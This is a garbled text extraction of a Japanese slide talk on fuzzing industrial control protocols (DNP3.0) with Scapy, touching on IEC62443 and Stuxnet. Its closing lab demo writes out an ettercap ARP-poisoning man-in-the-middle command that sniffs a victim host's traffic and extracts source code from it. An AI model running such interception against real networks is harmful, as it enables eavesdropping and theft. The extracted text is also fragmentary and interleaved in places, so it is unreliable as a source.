Fuzzing Ashigirl96 from ZareGoto 1
Fuzzing ( ) Ashigirl96 from ZareGoto 2
Self - Introduction 3
Handle Name: Ashigirl96 - : Twitter : Network/Control System Security : Python : Scapy
139 1,2 )
139 1,2 )
8
Scapy is 9
10
Fuzzing is 11
12
13
自動車... ( ਊ ) 中二病君 14
( ਊ ) 中二病君 http://policecar.nomaki.jp/1.jpg 15
( ਊ ) http://home-bb.biz/wp-content/uploads/2013/07/c5cdaf66f8642101a3da8a60ec825ecf.jpg 16
工場... ( ਊ ) 中二病君 17
( ਊ ) http://cdn-ak.f.st-hatena.com/images/fotolife/w/wami/20090219/20090219234336.jpg 18
( ਊ ) http://tomtittot.asablo.jp/blog/img/2012/04/23/1f4451.jpg 19
リア充... ( ਊ ) 中二病君 20
( ਊ ) 中二病君 http://yaplog.jp/cv/warabidani/img/138/earthmoon_p.jpg 21
( ਊ ) http://yaplog.jp/cv/warabidani/img/138/earthmoon_p.jpg 22
23
(o ω ) 24
( `) 25
Scapy 26
Scapy is a powerful interactive packet manipulation program. http://www.secdev.org/projects/scapy/ 27
Scapy is a powerful interactive packet manipulation program. It is able to forge or decode packets of a wide number of protocols 28
send them on the wire, capture them, match requests and replies, Scapy is a powerful interactive packet manipulation and much more. program. It is able to forge or decode packets of a wide number of protocols 29
andle most classical tasks like scannin, probing, unit tests, attacks or networ e d send t i w a an replacehhping, 85% of nmap, arpspo f em on o s t them, the wiacke ng, tcpdump, tethereal, p0f, etc.). It als match p r e, e c d a s p l o r t c o u erqdu Scapy is a powerful interactive packet manipulation r e es toc e t o well at a lotan of other specific tasks that m s o r a p n program. e d g f d r r o e m o p r f l u i e e c o s h b t, an't handle, like sending invalid frame m m e o l u r b e n. a s i t I r own 802.11 frames, combining techni g+arp cache poisoning, VOIP decoding 30
31
in Python 32
33
34
35 ---- from kotobank.jp
36
37
38
39
40
IEC62443 41
IEC62443 ( )! WIB (nternational Instrument User s Association)! ISCI (ISA Security Compliance Institut) EDSA 42
EDSA 43
EDSA 44
45
EDSA (SDSA) (FSA) Level1 Level2 Level3 (CRT) 46
47
Fuzzing 48
Fuzzing (Fuzz) 49
50
Fuzz victim 51
For Example: ---- HTTPリクエスト GET / HTTP/1.1 Host: www.hoge.jp Host: www.hoge.jp Host: www.hoge.jp Host: www.hoge.jp Host: www.hoge.jp ---> Webサーバ(足軽画伯) 52
For Example: 53
For Example: 54
55
56
: 57
: : 58
: : : Scapy 59
DNP3.0 60
DNP3.0 Distributed Network Protocol HMI/SCADA RTU 61
DNP3.0 62
63
Application Layer 64
Transport Function 65
Data Link Layer 66
Field Scapy 67
68
69
Scapy Reference 70
71
72
95 FunctionCode = {! 96 0:"Confirm ",! 97 1:"Read ",! 98 2:"Write ",! 99 3:"Select ",! 100 4:"Operate ",! 101 5:"Dir operate ",! 102 6:"Dir operate No resp ",! 103 7:"Freeze ",! 104 8:"Freeze No resp ",! 105 9:"Freeze clear ",! 106 10:"Freeze clear No resp ",! 107 11:"Freeze at time ",! 108 12:"Freeze at time No resp ",! 109 13:"Cold restart ",! 110 14:"Warm restart ",! 111 15:"Initialize data ",! 112 16:"Initialize application ",! 113 17:"Start application ",! 114 18:"Stop application ",! 115 19:"Save configuration ",! 116 20:"Enable unsolicited ",! オレオレ コードの一部① 73!
117 21:"Disable unsolicited ",! 118 22:"Assign class ",! 119 23:"Delay measurement ",! 120 24:"Record current time ",! 121 25:"Open file ",! 122 26:"Close file ",! 123 27:"Delete file ",! 124 28:"Get file information ",! 125 29:"Authenticate file ",! 126 30:"Abort file "! 127 }! 128 class DNP3QR(Packet):! 129 name = "DNP3.0 request"! 130 fields_desc = [! 131 #Application Header! 132 #Application Control! 133 XByteField('seq',0),! 134 BitField('uns',0),! 135 BitField('con',0),! 136 BitField('fin',0),! 137 BitField('fir',0),! 138! 139 #Function Code! 140 ShortEnumField("type", 1, Funct オレオレ コードの一部② 74
DNP3.0 75
Off by one 76
77
78
79
Stuxnet 80
( ) 81
1.USB 82
2. 83
3. (C&C 80 (HTTP) 84
4. 85
5. 86
87
Function of Stuxnet 88
1. 500 KB 4000 89
2. / 90
3. 91
4. 2 rootkit 92
5. Windows WinCC/Step7 93
Stuxnet 94
( ) 95
( ) ( ) 96
( ) 9 Windows 97
How to 98
How to 個別攻撃手法の回避法 99
100
101
102
&& 103
104
(Scapy): http://fossies.org/dox/scapy-2.2.0/ http://www.secdev.org/projects/scapy/doc/build_dissect.html http://www.secdev.org/projects/scapy/doc/advanced_usage.html 105
(DNP3.0): http://www.dnp.org/default.aspx http://www.softech.co.jp/mm_120404_firm.htm http://www05.abb.com/global/scot/scot229.nsf/veritydisplay/ 65b4a3780db3b3f3c2256e68003dffe6/$file/rec523_dnpprotmanend.pdf 106
(Fuzzing): http://www.ipa.go.jp/security/vuln/fuzzing.html http://lifeofpentester.blogspot.jp/2013/10/ fuzz-testing-web-applications-with-burp.html 107
108
109
110
( )Scapy...!! 111
112
1.ettercapでARPキャッシュポイゾニングします 2.ettercapでキャプチャしたパケットをScapyで解析します 3.解析したのをPythonでごみょごみょして ソースコードを取り出します 4.それを某サイトに送ります 113
ettercap Scapy 114
192.168.1.17(Backtrack5) 192.168.1.4(Mac) 115
某サイト 192.168.1.17(Backtrack5) ARPキャッシュポイズニング 192.168.1.4(Mac) 116
某サイト 192.168.1.17(Backtrack5) ARPキャッシュポイズニング 192.168.1.4(Mac) 117 ソースコード投げる
某サイト 192.168.1.17(Backtrack5) BT5が奪取(?) ARPキャッシュポイズニング 192.168.1.4(Mac) 118 ソースコード投げる
某サイト 192.168.1.17(Backtrack5) 解析... ARPキャッシュポイズニング 192.168.1.4(Mac) 119 ソースコード投げる
Ettercap LAN ( ) 120
Ettercap LAN ( ) 121
Ettercap LAN ( ) 122
Ettercap LAN ( ) 123
Ettercap LAN ( ) 124
http://sourceforge.jp/projects/sfnet_ettercap/ 125
1.ettercapでARPキャッシュポイゾニングします 2.ettercapでキャプチャしたパケットをScapyで解析します 3.解析したのをPythonでごみょごみょして ソースコードを取り出します 4.それを某サイトに送ります 5.正答します 126
127
%ettercap -T -M arp -i eth1 /192.168.1.4/ /192.168.1.1/ -w 01.pcap 128
%ettercap -T -M arp -i eth1 /192.168.1.4/ /192.168.1.1/ -w 01.pcap use text only CUI 129
%ettercap -T -M arp -i eth1 /192.168.1.4/ /192.168.1.1/ -w 01.pcap METHOD:ARGS perform a mitm attack in this case, ARP cache poisoning 130
%ettercap -T -M arp -i eth1 /192.168.1.4/ /192.168.1.1/ -w 01.pcap -i, iface use this network interface in this case, use 'eth1' 131
%ettercap -T -M arp -i eth1 /192.168.1.4/ /192.168.1.1/ -w 01.pcap Attacker and victim 132
%ettercap -T -M arp -i eth1 /192.168.1.4/ /192.168.1.1/ -w 01.pcap -w, write write sniffed data to pcapfile 133
192.168.1.4(victim) 134
1.ettercapでARPキャッシュポイゾニングします 2.ettercapでキャプチャしたパケットをScapyで解析します 3.解析したのをPythonでごみょごみょして ソースコードを取り出します 4.それを某サイトに送ります 135
1. 136
2. 137
3. 138
4. 139
140
141